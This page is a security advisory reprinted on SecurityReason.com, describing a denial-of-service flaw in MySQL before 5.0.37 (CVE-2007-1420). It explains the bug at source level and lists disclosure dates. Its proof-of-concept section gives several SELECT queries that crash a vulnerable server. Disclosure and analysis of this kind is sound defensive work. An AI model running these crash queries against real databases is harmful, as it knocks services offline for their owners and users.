SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

MySQL 5 Single Row Subselect Denial of Service


Arrow  SecurityAlert : 2413
Arrow  CVE : CVE-2007-1420
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : No
Arrow  Local Exploit : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : S.Streichbier B.Mueller
Arrow  Published : 14.03.2007

Arrow  Affected Software : MySQL < 5.0.37



Arrow  Advisory Content :  

SEC-CONSULT Security Advisory < 20070309-0>
========================================================================
===
title: MySQL 5 Single Row Subselect Denial of Service
program: MySQL 5
vulnerable version: < 5.0.37
impact: moderate
homepage: http://www.mysql.com
found: 2007-02-10
by: S.Streichbier / SEC-CONSULT / www.sec-consult.com
B.Mueller / SEC-CONSULT / www.sec-consult.com
permanent link: http://www.sec-consult.com/284.html
========================================================================
===

Vendor description:
---------------

MySQL, the most popular Open Source SQL database management system, is
developed, distributed, and supported by MySQL AB. MySQL AB is a
commercial company, founded by the MySQL developers. It is a second
generation Open Source company that unites Open Source values and
methodology with a successful business model.

[Source: http://www.mysql.com]

Vulnerability overview:
---------------

In order to exploit this vulnerability the attacker needs to execute
select statements on the database (e.g. SQL Injection).

Starting with version 5, MySQL provides access to the database metadata.
When using functions that operate on strings in combination with
subselects on information_schema tables and additional sorting of the
results with the ORDER BY clause, a null-pointer dereferencation takes
place causing a segmentation fault.

This allows an attacker to crash the MySQL database. We have not found
any code execution vector resulting from this bug, though further
research into this and related bugs may provide interesting results.

Vulnerability details:
---------------

When a subselect in a string function is used,
Item_singlerow_subselect::val_str() is called. As it is not expected
that the result of a single row subselect will be sorted, certain fields
(specifically sort->io_cache) in the allocated struct st_table are not
initalized. Yet, when "ORDER BY" is used in the query, filesort() is run
on the table. The actual segfault occurs in an error handling routine in
filesort():

libmysqld/filesort.cc:

111 FILESORT_INFO table_sort;
(...)
117 memcpy(&table_sort, &table->sort, sizeof(FILESORT_INFO));
120 outfile= table_sort.io_cache;
(..)
269 err:
(..)
276 if (my_b_inited(outfile))

include/my_sys.h:

503 #define my_b_inited(info) (info)->buffer

This leads to a null pointer dereference (EAX+8 or EBX+8 = 0x00000008 in
our test installations) crashing mysqld.

proof of concept:
---------------

Any string function can be used to exploit this vulnerability.

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY
1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM
information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY
1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY
1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY
1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY
1),1,'lol');

vulnerable versions:
---------------

All versions since the introduction of INFORMATION_SCHEMA tables seem to
be vulnerable to the Denial of Service attack. The version 5.0.37 fixes
this security issue.

vendor status:
---------------
vendor notified: 2007-02-22
vendor response: 2007-02-22
patch available: 2007-03-09
coordinated disclosure: 2007-03-09

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Blindengasse 3
A-1080 Wien
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 15
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Stefan Streichsbier / @2007




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...
Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration
PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass
Copyright © SecurityReason.com. All Rights Reserved.